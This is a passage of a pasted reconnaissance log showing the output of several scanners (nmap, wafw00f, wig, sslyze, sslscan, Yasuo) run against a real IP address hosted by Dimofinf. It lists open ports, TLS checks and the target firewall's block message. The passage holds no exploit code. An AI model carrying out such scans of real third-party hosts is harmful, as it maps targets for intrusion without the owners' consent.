  596. By Sandro Gauci && Wendel G. Henrique
  597.  
  598. Checking http://85.17.16.76
  599. Generic Detection results:
  600. No WAF detected by the generic detection
  601. Number of requests: 14
  602. #######################################################################################################################################
  603.  
  604. wig - WebApp Information Gatherer
  605.  
  606.  
  607. Scanning http://85.17.16.76...
  608. _________________ SITE INFO __________________
  609. IP Title
  610. 85.17.16.76
  611.  
  612. __________________ VERSION ___________________
  613. Name Versions Type
  614.  
  615. ______________________________________________
  616. Time: 23.3 sec Urls: 600 Fingerprints: 40401
  617. #######################################################################################################################################
  618. HTTP/1.1 200 OK
  619. Date: Mon, 19 Nov 2018 08:56:11 GMT
  620. Content-Type: text/html
  621. Content-Length: 163
  622. Last-Modified: Tue, 07 Aug 2018 09:12:42 GMT
  623. X-XSS-Protection: 1; mode=block
  624. X-Nginx-Cache-Status: EXPIRED
  625. X-Server-Powered-By: Dimofinf INC
  626. Accept-Ranges: bytes
  627. Connection: keep-alive
  628. #######################################################################################################################################
  629. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:56 EST
  630. Nmap scan report for 85.17.16.76
  631. Host is up (0.12s latency).
  632.  
  633. PORT STATE SERVICE VERSION
  634. 110/tcp filtered pop3
  635. Too many fingerprints match this host to give specific OS details
  636. Network Distance: 1 hop
  637.  
  638. TRACEROUTE (using port 80/tcp)
  639. HOP RTT ADDRESS
  640. 1 125.68 ms 85.17.16.76
  641. #######################################################################################################################################
  642. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:56 EST
  643. Nmap scan report for 85.17.16.76
  644. Host is up.
  645.  
  646. PORT STATE SERVICE VERSION
  647. 123/udp open|filtered ntp
  648. Too many fingerprints match this host to give specific OS details
  649.  
  650. TRACEROUTE (using proto 1/icmp)
  651. HOP RTT ADDRESS
  652. 1 120.79 ms 10.251.200.1
  653. 2 120.81 ms 185.94.189.129
  654. 3 130.40 ms 82.102.29.40
  655. 4 130.60 ms 176.10.83.5
  656. 5 133.22 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  657. 6 133.25 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  658. 7 133.35 ms 81.17.34.23
  659. 8 132.25 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
  660. 9 ... 30
  661. #######################################################################################################################################
  662. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
  663. Nmap scan report for 85.17.16.76
  664. Host is up (0.12s latency).
  665.  
  666. PORT STATE SERVICE VERSION
  667. 161/tcp filtered snmp
  668. 161/udp open|filtered snmp
  669. Too many fingerprints match this host to give specific OS details
  670.  
  671. TRACEROUTE (using proto 1/icmp)
  672. HOP RTT ADDRESS
  673. 1 125.07 ms 10.251.200.1
  674. 2 125.11 ms 185.94.189.129
  675. 3 134.81 ms 82.102.29.40
  676. 4 134.85 ms 176.10.83.5
  677. 5 138.39 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  678. 6 136.95 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  679. 7 137.58 ms 81.17.34.23
  680. 8 136.57 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
  681. 9 ... 30
  682. #######################################################################################################################################
  683.  
  684. ^ ^
  685. _ __ _ ____ _ __ _ _ ____
  686. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  687. | V V // o // _/ | V V // 0 // 0 // _/
  688. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  689. <
  690. ...'
  691.  
  692. WAFW00F - Web Application Firewall Detection Tool
  693.  
  694. By Sandro Gauci && Wendel G. Henrique
  695.  
  696. Checking https://85.17.16.76
  697. #######################################################################################################################################
  698.  
  699.  
  700.  
  701. AVAILABLE PLUGINS
  702. -----------------
  703.  
  704. PluginHSTS
  705. PluginSessionResumption
  706. PluginSessionRenegotiation
  707. PluginCertInfo
  708. PluginOpenSSLCipherSuites
  709. PluginChromeSha1Deprecation
  710. PluginHeartbleed
  711. PluginCompression
  712.  
  713.  
  714.  
  715. CHECKING HOST(S) AVAILABILITY
  716. -----------------------------
  717.  
  718. 85.17.16.76:443 => 85.17.16.76:443
  719.  
  720.  
  721.  
  722. SCAN RESULTS FOR 85.17.16.76:443 - 85.17.16.76:443
  723. --------------------------------------------------
  724.  
  725. Unhandled exception when processing --reneg:
  726. _nassl.OpenSSLError -
  727. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  728.  
  729. Unhandled exception when processing --compression:
  730. _nassl.OpenSSLError -
  731. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  732.  
  733. * Session Resumption:
  734. With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
  735. ERROR #1: OpenSSLError -
  736. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  737. ERROR #2: OpenSSLError -
  738. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  739. ERROR #3: OpenSSLError -
  740. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  741. ERROR #4: OpenSSLError -
  742. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  743. ERROR #5: OpenSSLError -
  744. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  745. With TLS Session Tickets: ERROR: OpenSSLError -
  746. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  747.  
  748. Unhandled exception when processing --certinfo:
  749. _nassl.OpenSSLError -
  750. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  751.  
  752. * SSLV2 Cipher Suites:
  753. Undefined - An unexpected error happened:
  754. RC4-MD5 timeout - timed out
  755. RC2-CBC-MD5 timeout - timed out
  756. IDEA-CBC-MD5 timeout - timed out
  757. EXP-RC4-MD5 timeout - timed out
  758. EXP-RC2-CBC-MD5 timeout - timed out
  759. DES-CBC3-MD5 timeout - timed out
  760. DES-CBC-MD5 timeout - timed out
  761.  
  762. * SSLV3 Cipher Suites:
  763. Undefined - An unexpected error happened:
  764. SEED-SHA timeout - timed out
  765. RC4-MD5 timeout - timed out
  766. NULL-SHA timeout - timed out
  767. IDEA-CBC-SHA timeout - timed out
  768. EXP-RC4-MD5 timeout - timed out
  769. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  770. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  771. EXP-DES-CBC-SHA timeout - timed out
  772. EXP-ADH-RC4-MD5 timeout - timed out
  773. EXP-ADH-DES-CBC-SHA timeout - timed out
  774. EDH-RSA-DES-CBC3-SHA timeout - timed out
  775. EDH-RSA-DES-CBC-SHA timeout - timed out
  776. EDH-DSS-DES-CBC3-SHA timeout - timed out
  777. EDH-DSS-DES-CBC-SHA timeout - timed out
  778. ECDHE-RSA-RC4-SHA timeout - timed out
  779. ECDHE-RSA-NULL-SHA timeout - timed out
  780. ECDHE-RSA-DES-CBC3-SHA timeout - timed out
  781. ECDHE-RSA-AES256-SHA timeout - timed out
  782. ECDHE-RSA-AES128-SHA timeout - timed out
  783. ECDHE-ECDSA-RC4-SHA timeout - timed out
  784. ECDHE-ECDSA-NULL-SHA timeout - timed out
  785. ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
  786. ECDHE-ECDSA-AES128-SHA timeout - timed out
  787. ECDH-RSA-RC4-SHA timeout - timed out
  788. ECDH-RSA-NULL-SHA timeout - timed out
  789. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  790. ECDH-RSA-AES256-SHA timeout - timed out
  791. ECDH-RSA-AES128-SHA timeout - timed out
  792. ECDH-ECDSA-RC4-SHA timeout - timed out
  793. ECDH-ECDSA-AES256-SHA timeout - timed out
  794. ECDH-ECDSA-AES128-SHA timeout - timed out
  795. DHE-RSA-SEED-SHA timeout - timed out
  796. DHE-RSA-CAMELLIA256-SHA timeout - timed out
  797. DHE-RSA-CAMELLIA128-SHA timeout - timed out
  798. DHE-RSA-AES128-SHA timeout - timed out
  799. DHE-DSS-SEED-SHA timeout - timed out
  800. DHE-DSS-CAMELLIA256-SHA timeout - timed out
  801. DHE-DSS-AES128-SHA timeout - timed out
  802. DH-RSA-SEED-SHA timeout - timed out
  803. DH-RSA-DES-CBC3-SHA timeout - timed out
  804. DH-RSA-DES-CBC-SHA timeout - timed out
  805. DH-RSA-CAMELLIA256-SHA timeout - timed out
  806. DH-DSS-DES-CBC3-SHA timeout - timed out
  807. DH-DSS-DES-CBC-SHA timeout - timed out
  808. DH-DSS-CAMELLIA128-SHA timeout - timed out
  809. DH-DSS-AES256-SHA timeout - timed out
  810. DH-DSS-AES128-SHA timeout - timed out
  811. DES-CBC-SHA timeout - timed out
  812. CAMELLIA128-SHA timeout - timed out
  813. AES256-SHA timeout - timed out
  814. AECDH-RC4-SHA timeout - timed out
  815. AECDH-NULL-SHA timeout - timed out
  816. AECDH-DES-CBC3-SHA timeout - timed out
  817. AECDH-AES256-SHA timeout - timed out
  818. AECDH-AES128-SHA timeout - timed out
  819. ADH-SEED-SHA timeout - timed out
  820. ADH-RC4-MD5 timeout - timed out
  821. ADH-DES-CBC3-SHA timeout - timed out
  822. ADH-DES-CBC-SHA timeout - timed out
  823. ADH-CAMELLIA256-SHA timeout - timed out
  824. ADH-CAMELLIA128-SHA timeout - timed out
  825. ADH-AES128-SHA timeout - timed out
  826.  
  827.  
  828.  
  829. SCAN COMPLETED IN 123.54 S
  830. --------------------------
  831. Version: 1.11.12-static
  832. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  833.  
  834. Connected to 85.17.16.76
  835.  
  836. Testing SSL server 85.17.16.76 on port 443 using SNI name 85.17.16.76
  837.  
  838. TLS Fallback SCSV:
  839. Server does not support TLS Fallback SCSV
  840.  
  841. TLS renegotiation:
  842. Session renegotiation not supported
  843.  
  844. TLS Compression:
  845. Compression disabled
  846.  
  847. Heartbleed:
  848. TLS 1.2 not vulnerable to heartbleed
  849. TLS 1.1 not vulnerable to heartbleed
  850. TLS 1.0 not vulnerable to heartbleed
  851.  
  852. Supported Server Cipher(s):
  853.  
  854. #######################################################################################################################################
  855.  
  856. I, [2018-11-19T04:04:46.700182 #14634] INFO -- : Initiating port scan
  857. I, [2018-11-19T04:06:53.451359 #14634] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-19_04-04-46.xml
  858. I, [2018-11-19T04:06:53.452574 #14634] INFO -- : Discovered open port: 85.17.16.76:80
  859. I, [2018-11-19T04:06:54.056245 #14634] INFO -- : Discovered open port: 85.17.16.76:443
  860. I, [2018-11-19T04:06:54.605989 #14634] INFO -- : <<<Enumerating vulnerable applications>>>
  861.  
  862.  
  863. --------------------------------------------------------
  864. <<<Yasuo discovered following vulnerable applications>>>
  865. --------------------------------------------------------
  866. +----------+--------------------+-------------------+----------+----------+
  867. | App Name | URL to Application | Potential Exploit | Username | Password |
  868. +----------+--------------------+-------------------+----------+----------+
  869. +----------+--------------------+-------------------+----------+----------+
  870. #######################################################################################################################################
  871. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:07 EST
  872. NSE: Loaded 148 scripts for scanning.
  873. NSE: Script Pre-scanning.
  874. Initiating NSE at 04:07
  875. Completed NSE at 04:07, 0.00s elapsed
  876. Initiating NSE at 04:07
  877. Completed NSE at 04:07, 0.00s elapsed
  878. Initiating Parallel DNS resolution of 1 host. at 04:07
  879. Completed Parallel DNS resolution of 1 host. at 04:07, 16.50s elapsed
  880. Initiating SYN Stealth Scan at 04:07
  881. Scanning 85.17.16.76 [474 ports]
  882. Discovered open port 8888/tcp on 85.17.16.76
  883. Discovered open port 22/tcp on 85.17.16.76
  884. Discovered open port 21/tcp on 85.17.16.76
  885. Discovered open port 80/tcp on 85.17.16.76
  886. Discovered open port 443/tcp on 85.17.16.76
  887. Discovered open port 8890/tcp on 85.17.16.76
  888. Completed SYN Stealth Scan at 04:07, 5.14s elapsed (474 total ports)
  889. Initiating Service scan at 04:08
  890. Scanning 6 services on 85.17.16.76
  891. Service scan Timing: About 50.00% done; ETC: 04:09 (0:00:33 remaining)
  892. Service scan Timing: About 66.67% done; ETC: 04:10 (0:00:47 remaining)
  893. Completed Service scan at 04:09, 99.01s elapsed (6 services on 1 host)
  894. Initiating OS detection (try #1) against 85.17.16.76
  895. Retrying OS detection (try #2) against 85.17.16.76
  896. Initiating Traceroute at 04:09
  897. Completed Traceroute at 04:09, 0.13s elapsed
  898. Initiating Parallel DNS resolution of 2 hosts. at 04:09
  899. Completed Parallel DNS resolution of 2 hosts. at 04:10, 16.50s elapsed
  900. NSE: Script scanning 85.17.16.76.
  901. Initiating NSE at 04:10
  902. Completed NSE at 04:11, 90.29s elapsed
  903. Initiating NSE at 04:11
  904. Completed NSE at 04:11, 1.21s elapsed
  905. Nmap scan report for 85.17.16.76
  906. Host is up (0.12s latency).
  907. Not shown: 465 filtered ports
  908. PORT STATE SERVICE VERSION
  909. 21/tcp open ftp?
  910. | fingerprint-strings:
  911. | GenericLines, GetRequest, Help, NULL:
  912. | Your connection to this server has been blocked in this network firewall.
  913. | need to contact the network admin at [security@dimofinf.net] for further information.
  914. | Your blocked IP address is 194.187.249.229.
  915. | This server's hostname is unlimited6.dimofinf.net.
  916. | more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
  917. |_ Dimofinf Technologies Inc.
  918. |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
  919. 22/tcp open ssh?
  920. | fingerprint-strings:
  921. | GenericLines, GetRequest, HTTPOptions, NULL:
  922. | Your connection to this server has been blocked in this network firewall.
  923. | need to contact the network admin at [security@dimofinf.net] for further information.
  924. | Your blocked IP address is 194.187.249.229.
  925. | This server's hostname is unlimited6.dimofinf.net.
  926. | more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
  927. |_ Dimofinf Technologies Inc.
  928. 25/tcp closed smtp
  929. 80/tcp open http-proxy Squid http proxy
  930. | http-methods:
  931. |_ Supported Methods: OPTIONS HEAD GET POST
  932. |_http-open-proxy: Proxy might be redirecting requests
  933. |_http-title: Site doesn't have a title (text/html).
  934. 139/tcp closed netbios-ssn
  935. 443/tcp open https
  936. | fingerprint-strings:
  937. | SSLSessionReq, TLSSessionReq:
  938. | HTTP/1.1 403 OK
  939. | Content-type: text/html
  940. | <html>
  941. | <head>
  942. | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  943. | <title>Unauthorized Access - Dimofinf Technologies Inc</title>
  944. | <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
  945. | </head>
  946. | <body>
  947. | <center>
  948. |_ <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
  949. |_http-title: Unauthorized Access - Dimofinf Technologies Inc
  950. 445/tcp closed microsoft-ds
  951. 8888/tcp open sun-answerbook?
  952. | fingerprint-strings:
  953. | GetRequest, HTTPOptions:
  954. | HTTP/1.1 403 OK
  955. | Content-type: text/html
  956. | <html>
  957. | <head>
  958. | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  959. | <title>Unauthorized Access - Dimofinf Technologies Inc</title>
  960. | <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
  961. | </head>
  962. | <body>
  963. | <center>
  964. |_ <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
  965. 8890/tcp open ddi-tcp-3?
  966. | fingerprint-strings:
  967. | GenericLines, GetRequest:
  968. | HTTP/1.1 403 OK
  969. | Content-type: text/html
  970. | <html>
  971. | <head>
  972. | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  973. | <title>Unauthorized Access - Dimofinf Technologies Inc</title>
  974. | <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
  975. | </head>
  976. | <body>
  977. | <center>
  978. |_ <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
  979. 5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
  980. ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
  981. SF-Port21-TCP:V=7.70%I=7%D=11/19%Time=5BF27D70%P=x86_64-pc-linux-gnu%r(NUL
  982. SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
  983. SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
  984. SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
  985. SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
  986. SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
  987. SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
  988. SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
  989. SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
  990. SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
  991. SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
  992. SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
  993. SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
  994. SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
  995. SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
  996. SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
  997. SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(Help,18A,"Your\x20connection\
  998. SF:x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20netw
  999. SF:ork\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20
  1000. SF:admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20informat
  1001. SF:ion\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.
  1002. SF:\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r
  1003. SF:\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/kn
  1004. SF:owledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Techn
  1005. SF:ologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20connection\x20to\x20th
  1006. SF:is\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\x20fire
  1007. SF:wall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admin\x20at
  1008. SF:\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\.\r\nYo
  1009. SF:ur\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\nThis\x2
  1010. SF:0server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFor\x20mo
  1011. SF:re\x20information\x20visit:\x20https://www\.dimofinf\.net/knowledgebase
  1012. SF:\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technologies\x20
  1013. SF:Inc\.\r\n");
  1014. ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
  1015. SF-Port22-TCP:V=7.70%I=7%D=11/19%Time=5BF27D70%P=x86_64-pc-linux-gnu%r(NUL
  1016. SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
  1017. SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
  1018. SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
  1019. SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
  1020. SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
  1021. SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
  1022. SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
  1023. SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
  1024. SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
  1025. SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
  1026. SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
  1027. SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
  1028. SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
  1029. SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
  1030. SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
  1031. SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20conne
  1032. SF:ction\x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x
  1033. SF:20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20netwo
  1034. SF:rk\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20in
  1035. SF:formation\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\
  1036. SF:.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.n
  1037. SF:et\.\r\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.
  1038. SF:net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x2
  1039. SF:0Technologies\x20Inc\.\r\n")%r(HTTPOptions,18A,"Your\x20connection\x20t
  1040. SF:o\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\
  1041. SF:x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admi
  1042. SF:n\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\
  1043. SF:.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\n
  1044. SF:This\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFo
  1045. SF:r\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/knowle
  1046. SF:dgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technolog
  1047. SF:ies\x20Inc\.\r\n");
  1048. ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
  1049. SF-Port443-TCP:V=7.70%I=7%D=11/19%Time=5BF27D75%P=x86_64-pc-linux-gnu%r(SS
  1050. SF:LSessionReq,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r
  1051. SF:\n\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20c
  1052. SF:ontent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acc
  1053. SF:ess\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type
  1054. SF:=\"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{co
  1055. SF:lor:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;
  1056. SF:}td{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8p
  1057. SF:t;text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:u
  1058. SF:rl\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-
  1059. SF:repeat:\x20no-repeat;background-position:\x20left;}\thr{background-colo
  1060. SF:r:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:1
  1061. SF:0px\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;col
  1062. SF:or:\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20
  1063. SF:#666666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x2
  1064. SF:0class=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_bla
  1065. SF:nk\"\x20href=\"https://www\.dimofinf\.n")%r(TLSSessionReq,F19,"HTTP/1\.
  1066. SF:1\x20403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\
  1067. SF:r\r\n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20ch
  1068. SF:arset=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20T
  1069. SF:echnologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{backgr
  1070. SF:ound:#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;w
  1071. SF:idth:950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x
  1072. SF:20Lucida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x20
  1073. SF:1px\x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf
  1074. SF:\.net/images/firewall/line\.png'\);background-repeat:\x20no-repeat;back
  1075. SF:ground-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border
  1076. SF:-top:1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;ove
  1077. SF:rflow:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{fo
  1078. SF:nt-size:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</
  1079. SF:head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><spa
  1080. SF:n\x20style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://ww
  1081. SF:w\.dimofinf\.n");
  1082. ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
  1083. SF-Port8888-TCP:V=7.70%I=7%D=11/19%Time=5BF27D75%P=x86_64-pc-linux-gnu%r(G
  1084. SF:etRequest,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r\n
  1085. SF:\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20con
  1086. SF:tent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acces
  1087. SF:s\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type=\
  1088. SF:"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{colo
  1089. SF:r:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;}t
  1090. SF:d{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8pt;
  1091. SF:text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:url
  1092. SF:\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-re
  1093. SF:peat:\x20no-repeat;background-position:\x20left;}\thr{background-color:
  1094. SF:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:10p
  1095. SF:x\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;color
  1096. SF::\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20#6
  1097. SF:66666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20c
  1098. SF:lass=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_blank
  1099. SF:\"\x20href=\"https://www\.dimofinf\.n")%r(HTTPOptions,F19,"HTTP/1\.1\x2
  1100. SF:0403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\r\r\
  1101. SF:n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charse
  1102. SF:t=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20Techn
  1103. SF:ologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{background
  1104. SF::#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;width
  1105. SF::950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x20Lu
  1106. SF:cida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x201px\
  1107. SF:x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf\.ne
